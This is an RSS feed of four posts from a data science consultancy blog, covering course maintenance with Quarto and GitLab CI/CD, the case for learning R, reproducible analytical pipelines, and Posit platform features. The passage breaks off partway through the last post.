<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>The Jumping Rivers Blog</title><link>https://www.jumpingrivers.com/blog/</link><description>Recent content in Blog on Jumping Rivers - Data Science Training and Consultancy</description><generator>Hugo -- gohugo.io</generator><language>en-gb</language><atom:link href="https://www.jumpingrivers.com/blog/index.xml" rel="self" type="application/rss+xml"/><item><title>Using R to Teach R: Lessons for Software Development</title><link>https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/</link><pubDate>Thu, 09 Apr 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As we approach the decennial (10-year) anniversary since Jumping Rivers was founded in 2016, it&amp;rsquo;s a good time to reflect on what we have achieved in that time and share some lessons learned.&lt;/p&gt;
&lt;p&gt;If you have read our blogs previously then you will be aware that Jumping Rivers is a consultancy and training provider in all things data science. But did you know that we offer over 50 different courses spanning R, Python, Git, SQL and more?&lt;/p&gt;
&lt;p&gt;In this blog we will provide a glimpse into our internal process and share how we have streamlined the task of maintaining so many courses. Along the way we will share some good practices applicable to any big coding project, including packaging of source code and automated CI/CD.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-teaching-r-packages-reporting-gitlab"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-challenge"&gt;The challenge&lt;/h2&gt;
&lt;p&gt;Let&amp;rsquo;s start by laying out the key challenges which face us.&lt;/p&gt;
&lt;h3 id="1-multilingual-support"&gt;1. Multilingual support&lt;/h3&gt;
&lt;p&gt;Our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt; consists of over 50 courses. The majority of these are either based on R or Python or both:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;50% R&lt;/li&gt;
&lt;li&gt;30% Python&lt;/li&gt;
&lt;li&gt;5% R and Python&lt;/li&gt;
&lt;li&gt;15% other (Git, SQL, Tableau, Posit and more)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;At the very least, any solution that we come up with for standardising our courses must be compatible with both R and Python. Ideally it should also support some less taught languages including SQL and Git.&lt;/p&gt;
&lt;h3 id="2-maintenance"&gt;2. Maintenance&lt;/h3&gt;
&lt;p&gt;The world of R and Python is constantly changing. The languages themselves receive frequent updates, as do publicly available R packages on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; and Python packages on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This has the consequence that code which worked one year ago (or even one day) may no longer be functional with the latest package versions. We will need some way to track this and ensure that the code examples covered in our courses remain relevant and error-free.&lt;/p&gt;
&lt;h3 id="3-demand"&gt;3. Demand&lt;/h3&gt;
&lt;p&gt;We deliver over 100 courses per year. For a relatively small team of data scientists, this can be a lot to juggle!&lt;/p&gt;
&lt;p&gt;In an ideal world, the process of building the course materials, setting up the cloud environment for training, and managing all of the administration that goes along with this should be automated. That way, the trainer can focus on providing the highest quality experience for the attendees without having to worry about things going wrong on the day.&lt;/p&gt;
&lt;h2 id="the-solution"&gt;The solution&lt;/h2&gt;
&lt;p&gt;Our team is used to setting up data science workflows for clients, including automated reporting and migration of source code into packages. We have therefore applied these techniques in our internal processes, including training.&lt;/p&gt;
&lt;h3 id="automated-reporting"&gt;Automated reporting&lt;/h3&gt;
&lt;p&gt;You write a document which has to be updated on a regular basis; this might include a monthly presentation showing the latest company revenues. Does this scenario sound familiar?&lt;/p&gt;
&lt;p&gt;We &lt;em&gt;could&lt;/em&gt; regenerate the plots and data tables and manually copy and paste these into the report document. Even better, we can take advantage of free-to-use automated reporting frameworks including &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; and &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;R Markdown and Quarto both work as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;We provide a &amp;ldquo;YAML header&amp;rdquo; at the top of the report document with configuration and formatting options:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;---
title: &amp;#34;Introduction to Python&amp;#34;
authors:
- &amp;#34;Myles Mitchell&amp;#34;
date: &amp;#34;2026-04-02&amp;#34;
output: pdf
---
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The report body is formatted as Markdown and supports a mixture of plain text and code:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-qmd" data-lang="qmd"&gt;## Introduction
At it&amp;#39;s most basic, Python is essentially a calculator.
We can run basic calculations as follows:
```{python}
2 + 1
```
We can also assign the output of a calculation to a
variable so that it can be reused later:
```{python}
x = 2 + 1
print(x)
```
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice that we have included chunks of Python code. By making use of &lt;em&gt;chunk options&lt;/em&gt; we can configure code chunks to be executed when rendering the report. Any outputs from the code (plots, tables, summary statistics) can then be displayed.&lt;/p&gt;
&lt;p&gt;By migrating the code logic into the report itself, we can update our report assets at the click of a button whenever the data changes.&lt;/p&gt;
&lt;p&gt;We have taken inspiration from this approach with our course notes and presentation slides. This forces us to be rigorous with the code examples. Any runtime errors that are produced by faulty or outdated code would be visible in the course notes and by extension to the attendees of our courses.&lt;/p&gt;
&lt;p&gt;Crucially for us, R Markdown and Quarto are both compatible with R and Python. They also support syntax highlighting for languages like Git and SQL, as well as a variety of output formats including HTML and PDF.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/quarto-flow-chart.png" alt="Flow chart illustrating the automated reporting workflow with Quarto. Starting with a text-based .qmd file, this is converted into a Markdown format using Jupyter or knitr. Pandoc is then used to convert this into a variety of output formats including HTML, PDF and Word." /&gt;
&lt;h3 id="internal-r-packages"&gt;Internal R packages&lt;/h3&gt;
&lt;p&gt;So we have settled on a solution for building our course notes. But we have 50 different courses, and setting these up from scratch each time is going to get tedious!&lt;/p&gt;
&lt;p&gt;A good practice in any coding project is to avoid duplication as much as possible. Instead of copying and pasting code, we should really be migrating code into functions which are self contained, reusable and easy to test. This will mean fewer places to debug when things inevitably go wrong.&lt;/p&gt;
&lt;p&gt;Following a similar philosophy for our training infrastructure, we have migrated any reusable assets for our courses&amp;mdash;including logos, template files and styling&amp;mdash;into a collection of internal R packages.&lt;/p&gt;
&lt;p&gt;When building a new course, the developer can now focus on the aspects that are unique to that course:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Code examples&lt;/li&gt;
&lt;li&gt;Notes&lt;/li&gt;
&lt;li&gt;Exercises&lt;/li&gt;
&lt;li&gt;Presentation slides&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Everything else is taken care of automatically:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The appearance of the course notes and presentation slides.&lt;/li&gt;
&lt;li&gt;Build routines including converting the R Markdown / Quarto text files into HTML.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In addition to course templates, we also have internal packages for managing the administrative side of training, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Calculating pricing quotes for clients.&lt;/li&gt;
&lt;li&gt;Generating post-course certificates.&lt;/li&gt;
&lt;li&gt;Spinning up a bespoke &lt;a href="https://posit.co/products/enterprise/workbench/" rel="external"&gt;Posit Workbench&lt;/a&gt; environment for the course.&lt;/li&gt;
&lt;li&gt;Summarising attendee feedback.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And the list goes on!&lt;/p&gt;
&lt;h3 id="gitlab-cicd"&gt;GitLab CI/CD&lt;/h3&gt;
&lt;p&gt;With automated reporting and packaging of source code, we have created standardised routines that can be applied to any of our courses.&lt;/p&gt;
&lt;p&gt;This does not change the fact that we have over 50 courses to maintain. We still need a way of testing our courses and tracking issues. This is where CI/CD (Continuous Integration / Continuous Development and Deployment) comes in.&lt;/p&gt;
&lt;p&gt;CI/CD defines a framework for software development, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Automated unit testing.&lt;/li&gt;
&lt;li&gt;Branching of source code and code review.&lt;/li&gt;
&lt;li&gt;Versioning and deployment of software.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you maintain software then you have likely come across version control with Git. Cloud platforms like &lt;a href="https://gitlab.com/" rel="external"&gt;GitLab&lt;/a&gt; and &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; provide tools for collaborative code development. Not only do they provide a cloud backup of your source code, they also provide the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CI/CD tools for automated testing, build and deployment.&lt;/li&gt;
&lt;li&gt;Branch rules for enforcing good practices like code review and unit testing.&lt;/li&gt;
&lt;li&gt;Versioning and tagging of source code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each of our courses is maintained via it&amp;rsquo;s own GitLab repository. The CI/CD pipelines for our courses are defined in a separate repository along with the internal R packages mentioned above.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/standardisation.png" alt="Flow chart illustrating how we have standardised our GitLab training repositories. The templates are defined in a central repository and pushed downstream to our course repositories." /&gt;
&lt;p&gt;When setting up a new course, the course repository will be automatically populated with the template CI/CD rules. All courses are therefore subject to the same stringent checks, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ensuring that the course notes build without errors.&lt;/li&gt;
&lt;li&gt;Enforcing code review of any course updates before these are merged into the main branch.&lt;/li&gt;
&lt;li&gt;Building and storing the &lt;em&gt;artifacts&lt;/em&gt; (the rendered HTML notes and coding scripts) for the latest version of the course.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These checks are triggered by any updates to a course. We also schedule monthly CI/CD pipelines for all courses, with any issues immediately flagged to our trainers.&lt;/p&gt;
&lt;p&gt;We have also taken advantage of GitLab&amp;rsquo;s folder-like structure for organising code repositories. Within the Jumping Rivers project on GitLab, we have a subproject called &amp;ldquo;training&amp;rdquo;. All of our course-related repositories are located &amp;ldquo;downstream&amp;rdquo; from this project. This means that any settings or environment variables defined at the &amp;ldquo;training&amp;rdquo; level are automatically applied to all of our courses.&lt;/p&gt;
&lt;h2 id="in-summary"&gt;In summary&lt;/h2&gt;
&lt;p&gt;The take-home lessons from this blog are applicable to any big coding project:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Avoid duplication: migrate any reusable logic or assets into standalone packages.&lt;/li&gt;
&lt;li&gt;Utilise CI/CD workflows using GitLab, GitHub or similar.&lt;/li&gt;
&lt;li&gt;Focus on what matters by automating as much of the process as possible.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our training infrastructure has taken 10 years to build and is still constantly evolving; we have not even covered the full process in this blog! For a deeper dive, check out this &lt;a href="https://youtu.be/MD0F3ChgqBE?si=EFSHE6MOqgU5I9UM" rel="external"&gt;talk&lt;/a&gt; by Myles at SatRdays London 2024.&lt;/p&gt;
&lt;p&gt;For more on automated reporting, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/quarto-for-python-users/" rel="external"&gt;Quarto for the Python user&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/" rel="external"&gt;Parameterised presentations with Quarto&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more on packaging of source code, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/personal-r-package/" rel="external"&gt;Writing a personal R package&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Three-part series: &lt;a href="https://www.jumpingrivers.com/blog/?search=creating+a+python+package" rel="external"&gt;Creating a Python package&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Four-part series: &lt;a href="https://www.jumpingrivers.com/blog/?search=r+package+quality" rel="external"&gt;R package quality&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/teaching-r-packages-reporting-gitlab/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why Learning R is a Good Career Move in 2026</title><link>https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/</link><pubDate>Thu, 26 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over the course of my career as a Data Scientist, I&amp;rsquo;ve worked on projects ranging from simple code reviews, to large application builds. For the most part, I have used R to do this.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re getting into coding or data science, one question you&amp;rsquo;re probably asking yourself is &lt;em&gt;&amp;ldquo;Which language should I learn?&amp;rdquo;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This blog aims to show you why R might be a good decision.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;hr&gt;
&lt;h2 id="r-was-built-for-data-not-just-programming"&gt;R was built for data (not just programming)&lt;/h2&gt;
&lt;p&gt;Unlike general purpose languages (such as Python), R was designed specifically for statistics and data analysis.&lt;/p&gt;
&lt;p&gt;That means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Built in statistical tools&lt;/li&gt;
&lt;li&gt;Powerful visualisation capabilities&lt;/li&gt;
&lt;li&gt;Research level methods available immediately&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With packages like the &lt;strong&gt;tidyverse&lt;/strong&gt;, you can clean, analyse, and visualise data with surprisingly little code.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="high-demand-in-analytics-research-and-healthcare"&gt;High demand in analytics, research, and healthcare&lt;/h2&gt;
&lt;p&gt;R is especially popular in many sectors such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Healthcare &amp;amp; biostats&lt;/li&gt;
&lt;li&gt;Academic research&lt;/li&gt;
&lt;li&gt;Government departments&lt;/li&gt;
&lt;li&gt;Finance &amp;amp; risk modeling&lt;/li&gt;
&lt;li&gt;Pharmaceutical companies&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here are some examples of R in production use:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://github.com/bbc/bbplot" rel="external"&gt;{bbplot} R package&lt;/a&gt;. Yes, the BBC use R to create graphics for their website!&lt;/li&gt;
&lt;li&gt;Health and wellbeing profiling &lt;a href="https://shiny.posit.co/r/gallery/government-public-sector/scotpho-profiles/" rel="external"&gt;app&lt;/a&gt; for the NHS&lt;/li&gt;
&lt;li&gt;During the Covid-19 pandemic, the financial times had a &lt;a href="https://www.ft.com/content/a2901ce8-5eb7-4633-b89c-cbdf5b386938" rel="external"&gt;stats tracker&lt;/a&gt; in which the graphs were built with R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Knowing some R will give you a competitive edge if you&amp;rsquo;re looking at working within these sectors.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="open-source-with-the-backing-of-posit"&gt;Open source with the backing of Posit&lt;/h2&gt;
&lt;p&gt;R is open source. This means that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s free, and always will be!&lt;/li&gt;
&lt;li&gt;Anyone can view the source code the makes up R, there are.&lt;/li&gt;
&lt;li&gt;Each R package (a folder containing code) has to live on &lt;a href="https://github.com/" rel="external"&gt;GitHub.com&lt;/a&gt;, for everyone to see.&lt;/li&gt;
&lt;li&gt;It has a large community of contributors. There are great forums to get help such as &lt;a href="https://stackoverflow.com/questions/tagged/r?tab=Votes" rel="external"&gt;Stack Overflow&lt;/a&gt;, &lt;a href="https://forum.posit.co/" rel="external"&gt;Posit Community&lt;/a&gt; and the &lt;a href="https://rweekly.org/" rel="external"&gt;R weekly newsletter&lt;/a&gt; and tonnes more.&lt;/li&gt;
&lt;li&gt;There are thousands more available functionalities compared to paid softwares such as SPSS, SAS or Excel.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;, who maintain the free to use RStudio and Positron IDEs (integrated development environment), have many full time staff working solely on maintaining and creating new functionality within R. This means we get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Defined accountability&lt;/li&gt;
&lt;li&gt;Predictable release cycles&lt;/li&gt;
&lt;li&gt;Bugs can be solved quicker&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="incredible-data-visualisation-possibilities"&gt;Incredible data visualisation possibilities&lt;/h2&gt;
&lt;p&gt;Being able to communicate your findings with stakeholders is very important in data science, and one of R’s biggest strengths is visualisation and reporting.&lt;/p&gt;
&lt;p&gt;With the &lt;strong&gt;{ggplot2}&lt;/strong&gt; package, you can create publication ready charts with very little code. The &lt;a href="https://r-graph-gallery.com/best-r-chart-examples.html" rel="external"&gt;R Graph Gallery&lt;/a&gt; has some amazing examples of what is possible with {ggplot2}.&lt;/p&gt;
&lt;p&gt;With the &lt;strong&gt;{quarto}&lt;/strong&gt; and &lt;strong&gt;{shiny}&lt;/strong&gt; packages, you are able to build reproducible reports and interactive dashboards. All this without needing to know any HTML, CSS or JavaScript.&lt;/p&gt;
&lt;h2 id="beginner-friendly-learning-curve"&gt;Beginner friendly learning curve&lt;/h2&gt;
&lt;p&gt;This is very much my own opinion. Compared to other languages, I think R is
fairly intuitive and feels rewarding much earlier on in the journey. It also has (in my opinion), the most beginner friendly programme to code in, called RStudio.&lt;/p&gt;
&lt;p&gt;Most people attend only two days worth of training with Jumping Rivers, and say they feel ready to start tackling their own data problems.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="so-is-r-worth-learning-in-2026"&gt;So… is R worth learning in 2026?&lt;/h2&gt;
&lt;p&gt;I think so. If you want pure software engineering or large-scale production systems, you may need Python. But for becoming a &lt;strong&gt;strong data thinker&lt;/strong&gt;, and giving you an edge in your analysis, R is one of the best starting points.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-learning-r-is-a-good-career-move-in-2026/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Reproducible Analytical Pipelines</title><link>https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/</link><pubDate>Thu, 19 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here&amp;rsquo;s the new data. Could you summarise it
like Alice did last year, and send me a report?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The civil service and public bodies in the UK publish lots of &lt;a href="https://www.data.gov.uk/" rel="external"&gt;datasets&lt;/a&gt;.
These datasets can be really helpful when experimenting with data visualisation and presentation
tools.
As data consumers, what we rarely see is the amount of work that goes into preparing those datasets,
or how they are used to make decisions about, or understand trends within the country.
That work has to be coordinated across multiple people, each with different skills.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-reproducible-analytical-pipelines"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Much like teams do, software and data evolve over time.
The raw data that feeds into the above datasets, and any products that are built upon them (reports,
applications and so on), may only be collected and processed every few years - and a lot can change
in a few years.
So, teams within those departments need a way to reliably generate those datasets and data products
from newly-collected raw data that is robust (or at least flexible) enough to accommodate changes
in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;data quality,&lt;/li&gt;
&lt;li&gt;the structure/schema of the raw data,&lt;/li&gt;
&lt;li&gt;personnel within the team and departmental restructuring,&lt;/li&gt;
&lt;li&gt;software tooling,&lt;/li&gt;
&lt;li&gt;output data format or usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It is becoming more common for this kind of data processing to be handled by a
&lt;em&gt;Reproducible Analytical Pipeline&lt;/em&gt; (RAP).
A RAP is a, largely, automated process written in code.
An aim of using RAPs here, is to reduce the amount of manual and ad-hoc input into the data
processing, so that when given the same input data you would generate the same downstream products
and so that the process should work successfully and predictably when given new data.
By placing the processing decisions in code, RAPs make data processing more easily auditable and
more transparent.&lt;/p&gt;
&lt;p&gt;The
&lt;a href="https://analysisfunction.civilservice.gov.uk/support/reproducible-analytical-pipelines/" rel="external"&gt;UK Civil Service&lt;/a&gt;
and &lt;a href="https://nhsdigital.github.io/rap-community-of-practice/" rel="external"&gt;the NHS&lt;/a&gt; have guidelines on their aims
for RAPs and how to create these pipelines.&lt;/p&gt;
&lt;p&gt;Now, you might not be working for one of those institutions, and the data processing and analysis
that you perform might not be public facing or subject to a national audit.
But, if you&amp;rsquo;re doing data science or data processing as part of your job, the ideas surrounding RAPs
may help you work more efficiently.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s start with the basics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;where does your data come from?&lt;/li&gt;
&lt;li&gt;where does it go to?&lt;/li&gt;
&lt;li&gt;what is your main tool when working with it?&lt;/li&gt;
&lt;li&gt;and who else either depends upon, or is also responsible for, your work?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The
&lt;a href="https://analysisfunction.civilservice.gov.uk/support/reproducible-analytical-pipelines/" rel="external"&gt;RAP guidelines for the UK Civil Service&lt;/a&gt;
promote the use of open-source tools, version control, and automation.
Which tools should you choose, what should you automate, and who needs to know about or approve what
you are doing?&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve inherited an Excel workbook with last year&amp;rsquo;s data embedded inside it and you need to
process this year&amp;rsquo;s data, you may not know enough about the processes that occurred before last
year&amp;rsquo;s data was copied into the spreadsheet or any manual tweaks that happened after it was imported
(how were missing values handled etc).
You could automate the early, data ingestion, stages.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re inherited some SQL scripts that make database queries and you have to
copy-paste the resulting values into a report, you could automate the report-generation step.&lt;/p&gt;
&lt;p&gt;If you have a collection of analysis steps or scripts, that have to be called in a particular order,
or where you have to manually edit the scripts (fixing the filepaths, for example) for them to work
with a new raw-data release, you could think about how to orchestrate running those scripts or how
to configure the project so that it requires less manual intervention to run next time.
Editing code and calling commands in a programming environment are manual processes, too.&lt;/p&gt;
&lt;p&gt;You may not be able to automate everything at once.
So try to make strategic wins on those areas of your data workflow that are the least clear, or that
involve the most manual input.&lt;/p&gt;
&lt;p&gt;The push towards automation requires programming skills, and a choice over a programming language.
In data science this typically means SQL plus either R or Python.
Which you choose for a project, depends on the skills across your team and the infrastructure that
is available to you.
Don&amp;rsquo;t use your favourite language, or a language you want to experiment with, if no-one else on the
team can review your code or take over the project from you.&lt;/p&gt;
&lt;p&gt;One of the best resources that I found while researching this blog post was the book
&lt;a href="https://raps-with-r.dev/" rel="external"&gt;&amp;ldquo;Building reproducible analytical pipelines with R&amp;rdquo;&lt;/a&gt;
by Bruno Rodrigues.
That book covers many of the topics mentioned above: how to set up a project with version control,
how to generate automated reports, how to orchestrate multiple analytical processes together.
It is a very R-focussed book, but the ideas hold whether you work in Python or another language.&lt;/p&gt;
&lt;p&gt;Reproducibility in data science has a long-standing counterpart in
&lt;a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC10591307/" rel="external"&gt;science more generally&lt;/a&gt;.
If you write a scientific paper, the data upon which it is based, and the data-processing steps
involved should be made available.
But they should be created in such a way that they can be reused.
If someone wants to regenerate your results, and they can download your data and code, the code
should be written in such a way that this is guaranteed.
Just releasing a script on GitHub isn&amp;rsquo;t enough - the precise version of any used scripts and
project-specific data should be tagged; the programming environment should be matched as closely as
possible (for example, matching the version of R or Python used, using the same versions of any
installed packages); any supporting data sources should be pinned to specific versions and so on.&lt;/p&gt;
&lt;p&gt;For us though, RAPs are more about ensuring that data-processing is predictable and transparent,
and that processes can be reused at a subsequent date and with updated data.
Your team may need to level-up their programming skills, or their knowledge of your programming
environment, to take advantage of improved automation.
But doing so will reduce the amount of repetitive manual tasks, simplify on-boarding new team
members, and make maintenance easier.&lt;/p&gt;
&lt;p&gt;Also, automating stuff is really fun.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/reproducible-analytical-pipelines/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Three Posit Platform Features Worth Knowing About</title><link>https://www.jumpingrivers.com/blog/posit-platform-updates/</link><pubDate>Fri, 13 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-platform-updates/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-platform-updates/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-platform-updates/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We recently ran a session on &lt;a href="https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/" rel="external"&gt;Posit platform updates&lt;/a&gt;, the kind of features that don&amp;rsquo;t always make it onto your radar but can make a real difference once you know they&amp;rsquo;re there.&lt;/p&gt;
&lt;p&gt;This post covers the three highlights: speeding up R package installation with Posit Package Manager, a new way to explore example apps on Connect, and Workbench Jobs for long-running tasks.&lt;/p&gt;
&lt;h2 id="r-package-installs-dont-have-to-take-26-minutes"&gt;R package installs don&amp;rsquo;t have to take 26 minutes&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve ever kicked off a Tidyverse install and gone to make a coffee (and come back to find it still running), this one&amp;rsquo;s for you. When installing from source, which is what happens if you point R at a plain CRAN mirror on Linux — R downloads the source tarball and compiles everything from scratch. That takes time. A lot of it. In our test, a clean Tidyverse install on R 4.4 took 26 minutes.&lt;/p&gt;
&lt;p&gt;The fix is to point R at a binary-supporting mirror, which is exactly what &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;Posit Package Manager&lt;/a&gt; provides. With binaries, that same install dropped to under two minutes, no compilation, no hunting down system dependencies.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re on R 4.5, it gets better. R 4.5 introduced parallel package downloads, which cuts that two-minute install down to around 40 seconds. Throw in parallel CPU usage for installation as well via the &lt;code&gt;Ncpus&lt;/code&gt; argument, and you&amp;rsquo;re looking at 15 seconds for a full Tidyverse install in a clean environment.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s also a preview feature to keep an eye on: ManyLinux support in &lt;a href="https://posit.co/products/enterprise/package-manager/" rel="external"&gt;Package Manager&lt;/a&gt;. The idea is to bundle more of the system-level dependencies into the package itself, which means less dependency management for sysadmins. Downloads are a bit larger, but the maintenance overhead is lower. If you want a deeper dive into PPM itself, we have a &lt;a href="https://www.jumpingrivers.com/training/course/package-management-with-ppm/" rel="external"&gt;Managing Packages with Posit Package Manager training course&lt;/a&gt; that covers this in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The short version:&lt;/strong&gt; use binaries + R 4.5 + parallel installs. You can go from half an hour to about 15 seconds.&lt;/p&gt;
&lt;h2 id="connect-gallery-example-apps-without-the-setup-friction"&gt;Connect Gallery: example apps without the setup friction&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve used &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit Connect&lt;/a&gt; for a while, you might remember the quick-start popup that appeared on first login — a set of example apps you could try out. That&amp;rsquo;s been replaced by Connect Gallery, which lives in the interface rather than popping up in front of you.&lt;/p&gt;
&lt;p&gt;What&amp;rsquo;s changed isn&amp;rsquo;t just where it lives. Installing an example app is now one click. Previously you&amp;rsquo;d follow a set of instructions to get it running; now it just deploys.&lt;/p&gt;
&lt;p&gt;Two examples worth highlighting from the gallery:&lt;/p&gt;
